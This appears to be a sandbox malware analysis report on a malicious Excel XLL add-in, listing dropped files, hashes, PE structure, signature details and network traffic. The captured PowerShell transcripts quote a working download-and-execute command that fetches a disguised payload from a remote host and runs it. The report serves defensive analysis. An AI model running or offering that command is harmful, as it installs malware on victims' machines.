                                                                                                                                                  Size (bytes):763392
                                                                                                                                                  Entropy (8bit):6.644646436393566
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:4AbvaOTfFGikmS6jd2QML8HXWp8KEwbHBkm9jjgbFHLViv0dC2x0uTadTaUk7u:vbvJfFGikmS0pXfw7Bkm9j088PlTaDj
                                                                                                                                                  MD5:ED1921467F6784AF6BDCA40A06A541B5
                                                                                                                                                  SHA1:63B70725C3298D5FA17277EC64C77A4B6FBCF697
                                                                                                                                                  SHA-256:3DB14214A9EB98B3B5ABFFCB314C808A25ED82456CE01251D31E8EA960F6E4E6
                                                                                                                                                  SHA-512:A30779D84521049F4CEBA11B0F0B16430DB8A38FF38AB540585C9AE89D7214655E0C5C246E21E97AB65D8F3DC0D472DDB8BDA1E01AF82E632C66A2CCD159F020
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........c..m...m...m......m.......m......m......m...m...m......m......m.......m..Rich.m..................PE..L....<.`.................b...................................................p......W.....@..................................u..........@.................... ..@G..p9..T............................9..@............................................text....`.......b.................. ..`.rdata..P............f..............@..@.data............^...l..............@....rsrc...@...........................@..@.reloc..@G... ...H...^..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\F2E779D9-2A7F-4724-B0D9-67BDDA1F0003
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):135209
                                                                                                                                                  Entropy (8bit):5.363084368102766
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:qcQIKNgeBTA3gBwlpQ9DQW+zoY34ZliKWXboOidX5E6LWME9:MEQ9DQW+zwXO1
                                                                                                                                                  MD5:585F16F872D700ED9074C9599BFCAA8D
                                                                                                                                                  SHA1:A7B0CEC26282A4EBDD6B8A336B6C922EB7CCB546
                                                                                                                                                  SHA-256:27F46B4BD834974CEEC3353473B97BCF16BD3AF5FBD14BEC8340D2B8048BA237
                                                                                                                                                  SHA-512:94B68F6C6BF74CFCE8CF9D3E908EB674EDF0F93B097885301BF60B6D536BC38FB596DE3047142BCBF8F879FC417632F11B4BDCAFB8C4C4C8AFBCB1BCDF34C73C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-07-08T14:30:08">.. Build: 16.0.14306.30528-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):17512
                                                                                                                                                  Entropy (8bit):5.575682556842605
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:qtpOrhtOomtrzRkSBKnKileIoK7Q99gtSJQpO1ViYbR:H4KKiler98tRC7l
                                                                                                                                                  MD5:804765CA20FB452B7AFDC20F54DDC5BC
                                                                                                                                                  SHA1:1E475060FAC7DC9546B6DF29B78D139485F5E105
                                                                                                                                                  SHA-256:1E64FB0B2717B6E64DC2C096EF0169206D5C25A854760C212FBA76EF5E362E51
                                                                                                                                                  SHA-512:2887822470F0F2C21FC08F7DF3EBEBF873E9844C62F5666A66D43D1345E003BCB6A8CDDFDAC42ADA6C34C750092E2190F2B5460E531382E1604493FD6E4BA6A6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: @...e.......................7.(.k.....].7............@..........H...............<@.^.L."My...:D..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)R.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.P................./.C..J..%...].2.....%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_021oib5j.5er.ps1
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview: 1
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33lmhbcg.erz.psm1
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: 1
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l5bzl405.f5n.psm1
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: 1
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m31y4pff.piz.ps1
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: 1
                                                                                                                                                  C:\Users\user\Documents\20210708\PowerShell_transcript.888683.0syxhOX+.20210708163014.txt
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1205
                                                                                                                                                  Entropy (8bit):5.311205245712001
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:BxSA5xvBnnDx2DOXUWTLST1lDPWKHjeTKKjX4CIym1ZJXgrLST1lDRnxSAZ0:BZLvhDoOXu1cKqDYB1ZUu1vZZ0
                                                                                                                                                  MD5:45D933EF1A814178B4C30D1C511EEA62
                                                                                                                                                  SHA1:92AB0E5235A9C4FED5941154906879B3C51F8FD2
                                                                                                                                                  SHA-256:FF3092607FC1517161D2C45D1014A05475343498EEFC44C7C834FB81661D7688
                                                                                                                                                  SHA-512:16EE676884C815562AD21973E371EDB772514726DA50D1DDE806BA92A4335871DAF897D90A89FA8C5F963E4F34728716C4048EBDC763A8E419CEB7C67BF5B35F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210708163025..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 888683 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'..Process ID: 5944..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210708163026..**********************..PS>poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'....********
                                                                                                                                                  C:\Users\user\Documents\20210708\PowerShell_transcript.888683.93l2YHGR.20210708163033.txt
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1066
                                                                                                                                                  Entropy (8bit):5.2109369727717985
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:BxSADxvBnnDx2DOXUW4L1+WEHjeTKKjX4CIym1ZJXsNnxSAZNq:BZtvhDoOs1pEqDYB1ZOxZZNq
                                                                                                                                                  MD5:2DB1F1A4DD113B692007B7089DE7A226
                                                                                                                                                  SHA1:03920B9D36563DFB26E0408BD2A9DE9B8914F0FE
                                                                                                                                                  SHA-256:9815EE4EF24399DA60B77429BFB41E1D5BCDEB7B5FBA7DC2F4B9C442B7264215
                                                                                                                                                  SHA-512:A4788DA06C4FA30BD8302AF771B08EC605B72C06FA10A50671143E95DBD816D2264A9C5AE640B4783153F5A6A51413CC447CEEE15FE3EC1E8818F1DE2807B2BA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210708163045..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 888683 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -EX bYpASs -NOp -w 1 WGeT http://srand04rf.ru/08.jpg -OuTfIle c:\Users\Public\snd32sys.exe..Process ID: 5788..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210708163046..**********************..PS>WGeT http://srand04rf.ru/08.jpg -OuTfIle c:\Users\Public\snd32sys.exe..**********************..Command start time: 20210708163350..**********************..PS>$global:?..True..**********************..Windows PowerShell

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Entropy (8bit):6.069104587121557
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                  • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                  • VXD Driver (31/22) 0.00%
                                                                                                                                                  File name:0708_5355150121.xll
                                                                                                                                                  File size:24488
                                                                                                                                                  MD5:41e0318dfdb1c180a375a7efc712649e
                                                                                                                                                  SHA1:f0c230010c7b85544c25879d4daf74479360e1bc
                                                                                                                                                  SHA256:73b8c566d8cdf3200daa0b698b9d32a49b1ea8284a1e6aa6408eb9c9daaacb71
                                                                                                                                                  SHA512:b20ec32ba9f7269deda4f70e655bb7a105dde896524bfd9c788605f2a0a26bc3bc7ddceed93c4f7b14404a65107647a9b9840c8adec32c12d92138b69805cc17
                                                                                                                                                  SSDEEP:384:Er7ozcN5pozcU7ZHW7pw0jGWdqFQv6HovAcdKhKAUgLysGpwKNsc8kYN5:ika52naz78+KKd81UgLJc8ks
                                                                                                                                                  File Content Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L......`...........!...I.....@......................................................9s....@.............................B..

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:80b6f2d2f6f6d2cc

                                                                                                                                                  Static PE Info

                                                                                                                                                  General

                                                                                                                                                  Entrypoint:0xcd418fb
                                                                                                                                                  Entrypoint Section:.img
                                                                                                                                                  Digitally signed:true
                                                                                                                                                  Imagebase:0xcd40000
                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE
                                                                                                                                                  Time Stamp:0x60E5C2AB [Wed Jul 7 15:05:15 2021 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:1
                                                                                                                                                  OS Version Minor:0
                                                                                                                                                  File Version Major:1
                                                                                                                                                  File Version Minor:0
                                                                                                                                                  Subsystem Version Major:1
                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                  Import Hash:8fc6d9b5f93578c52ec239ef6c29b5ac

                                                                                                                                                  Authenticode Signature

                                                                                                                                                  Signature Valid:false
                                                                                                                                                  Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                                                  Signature Validation Error:A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file
                                                                                                                                                  Error Number:-2146762495
                                                                                                                                                  Not Before, Not After
                                                                                                                                                  • 6/8/2021 5:00:00 PM 6/9/2022 4:59:59 PM
                                                                                                                                                  Subject Chain
                                                                                                                                                  • CN=Storeks LLC, O=Storeks LLC, L=Moscow, C=RU
                                                                                                                                                  Version:3
                                                                                                                                                  Thumbprint MD5:D8E818AC7AC0DB90212FAB404C566D4C
                                                                                                                                                  Thumbprint SHA-1:91319E6A55BF0EF68DB8AFB31845AB961356175F
                                                                                                                                                  Thumbprint SHA-256:127B54C50D77A329A145B0A5686E2214D2ED40482C0375D0DE278BA4A135DEDE
                                                                                                                                                  Serial:1E5EFA53A14599CC82F56F0790E20B17

                                                                                                                                                  Entrypoint Preview

                                                                                                                                                  Instruction
                                                                                                                                                  mov eax, 00000001h
                                                                                                                                                  retn 000Ch
                                                                                                                                                  sub esp, 00001254h
                                                                                                                                                  call 00007FBDDC907867h
                                                                                                                                                  imul eax, dword ptr [eax], 65h
                                                                                                                                                  add byte ptr [edx+00h], dh
                                                                                                                                                  outsb
                                                                                                                                                  add byte ptr [ebp+00h], ah
                                                                                                                                                  insb
                                                                                                                                                  add byte ptr [ebx], dh
                                                                                                                                                  add byte ptr [edx], dh
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add al, ch
                                                                                                                                                  sti
                                                                                                                                                  add al, byte ptr [eax]
                                                                                                                                                  add byte ptr [ecx+000DE8C3h], cl
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  dec esp
                                                                                                                                                  outsd
                                                                                                                                                  popad
                                                                                                                                                  dec esp
                                                                                                                                                  imul esp, dword ptr [edx+72h], 57797261h
                                                                                                                                                  add byte ptr [ebx-18h], dl
                                                                                                                                                  pop edx
                                                                                                                                                  add eax, dword ptr [eax]
                                                                                                                                                  add byte ptr [ecx+000FE8C7h], cl
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  inc edi
                                                                                                                                                  je 00007FBDDC9078A3h
                                                                                                                                                  jc 00007FBDDC9078C1h
                                                                                                                                                  arpl word ptr [ecx+64h], ax
                                                                                                                                                  jc 00007FBDDC9078B8h
                                                                                                                                                  jnc 00007FBDDC9078C5h
                                                                                                                                                  add byte ptr [ebx-18h], dl
                                                                                                                                                  add eax, dword ptr [eax]
                                                                                                                                                  add byte ptr [ecx+001AE8C6h], cl
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  inc ebp
                                                                                                                                                  js 00007FBDDC9078C2h
                                                                                                                                                  popad
                                                                                                                                                  outsb
                                                                                                                                                  inc ebp
                                                                                                                                                  outsb
                                                                                                                                                  jbe 00007FBDDC9078BBh
                                                                                                                                                  jc 00007FBDDC9078C1h
                                                                                                                                                  outsb
                                                                                                                                                  insd
                                                                                                                                                  outsb
                                                                                                                                                  je 00007FBDDC9078A5h
                                                                                                                                                  je 00007FBDDC9078C4h
                                                                                                                                                  imul ebp, dword ptr [esi+67h], 53005773h
                                                                                                                                                  call esi
                                                                                                                                                  push 00000104h
                                                                                                                                                  lea edx, dword ptr [esp+00001010h]
                                                                                                                                                  push edx
                                                                                                                                                  call 00007FBDDC90787Bh
                                                                                                                                                  and eax, 55005000h
                                                                                                                                                  add byte ptr [edx+00h], al
                                                                                                                                                  dec esp
                                                                                                                                                  add byte ptr [ecx+00h], cl
                                                                                                                                                  inc ebx
                                                                                                                                                  add byte ptr [72005C00h], ah
                                                                                                                                                  add byte ptr [ebp+00h], ah
                                                                                                                                                  jnc 00007FBDDC907852h
                                                                                                                                                  xor eax, dword ptr [eax]
                                                                                                                                                  xor al, byte ptr [eax]
                                                                                                                                                  add byte ptr [eax+00h], ch
                                                                                                                                                  je 00007FBDDC907852h
                                                                                                                                                  popad
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add bh, bh
                                                                                                                                                  shr al, 1
                                                                                                                                                  or al, 00h
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  inc ebx
                                                                                                                                                  jc 00007FBDDC9078B7h
                                                                                                                                                  popad

                                                                                                                                                  Data Directories

                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x90000x42.edata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x10000xf05.img
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x46000x19a8
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000x8.reloc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                  Sections

                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                  .img0x10000xf050xe00False0.495256696429data5.15354590708IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                  .ico0x20000x10000x1000False0.122802734375data1.29754900082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .fyjrtr0x30000x10000x1000False0.566650390625data5.36518457685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .rytkrer0x40000x10000x1000False0.767822265625data6.70050253557IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .reyery0x50000x2000x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .txt0x60000x2000x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .data0x70000x2000x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .res0x80000x2000x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .edata0x90000x420x200False0.103515625data0.543966493249IMAGE_SCN_MEM_READ
                                                                                                                                                  .reloc0xa0000x80x200False0.03515625data0.0203931352361IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                  Imports

                                                                                                                                                  DLLImport
                                                                                                                                                  msvbvm60.dll__vbaLateIdSt, __vbaBoolVar, rtcStringBstr, rtcRightTrimBstr, rtcEndOfFile, __vbaBoolVarNull, __vbaNextEachCollObj, rtcAbsVar, TipCreateInstanceEx, __vbaDerefAry1, __vbaFpUI1, rtcKillFiles, __vbaVarCmpLt, SetMemObj, __vbaForEachVar, BASIC_CLASS_QueryInterface, rtcEnvironBstr, EbLibraryLoad, Zombie_QueryInterface, rtR4FromErrVar, rtcMakeDir, VarPtr, PutMem2, rtcGetTimeValue, rtcPackDate, rtcCommandVar
                                                                                                                                                  kernel32.dllFindAtomA, SetFileApisToANSI, SetFileAttributesA, LockResource, lstrcmpiW, FreeEnvironmentStringsW, VirtualFree, SetMailslotInfo, EnumSystemLocalesA, ScrollConsoleScreenBufferA, GetConsoleCommandHistoryA, GlobalUnlock, GetSystemDirectoryW, FatalExit, _lopen, DisableThreadLibraryCalls, WaitForSingleObject, PostQueuedCompletionStatus, InvalidateConsoleDIBits, CreateDirectoryExA, lstrcmpA, LocalFlags, GetFileInformationByHandle, BeginUpdateResourceA, GetVDMCurrentDirectories, SetFileAttributesW, CreateSemaphoreW, ReadConsoleOutputAttribute
                                                                                                                                                  oleaut32.dllVarR4FromDisp, CreateStdDispatch, VarDateFromUI8, OleSavePictureFile, VarI2FromDisp, VarR8FromUI2, SysStringLen, VarDecFromUI2, VarR4FromUI8, SafeArrayCopyData, LPSAFEARRAY_Marshal, DispGetIDsOfNames, SafeArrayGetLBound, VarBstrFromR8, VarI2FromDec, GetRecordInfoFromGuids, VarBstrFromUI1, VarUI2FromI2, VarTokenizeFormatString
                                                                                                                                                  tapi32.dlllineCreateAgentSessionA, lineSetMediaControl, MMCGetAvailableProviders, lineNegotiateAPIVersion, lineDialA, lineDrop

                                                                                                                                                  Exports

                                                                                                                                                  NameOrdinalAddress
                                                                                                                                                  xlAutoOpen10xcd41903

                                                                                                                                                  Network Behavior

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jul 8, 2021 16:30:09.692430019 CEST4972480192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:09.726878881 CEST80497248.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:09.727005959 CEST4972480192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:09.727418900 CEST4972480192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:09.762516975 CEST80497248.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:09.811278105 CEST80497248.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:09.811317921 CEST80497248.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:09.811345100 CEST80497248.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:09.811362982 CEST80497248.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:09.811381102 CEST80497248.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:09.811399937 CEST80497248.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:09.811415911 CEST80497248.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:09.812691927 CEST4972480192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:10.367295027 CEST4972480192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.174525976 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.211349964 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.211483955 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.213911057 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.250462055 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.378170967 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.378241062 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.378279924 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.378309965 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.378346920 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.378382921 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.378420115 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.378422022 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.378456116 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.378460884 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.378468990 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.378492117 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.378510952 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.378530025 CEST80497488.211.241.0192.168.2.3
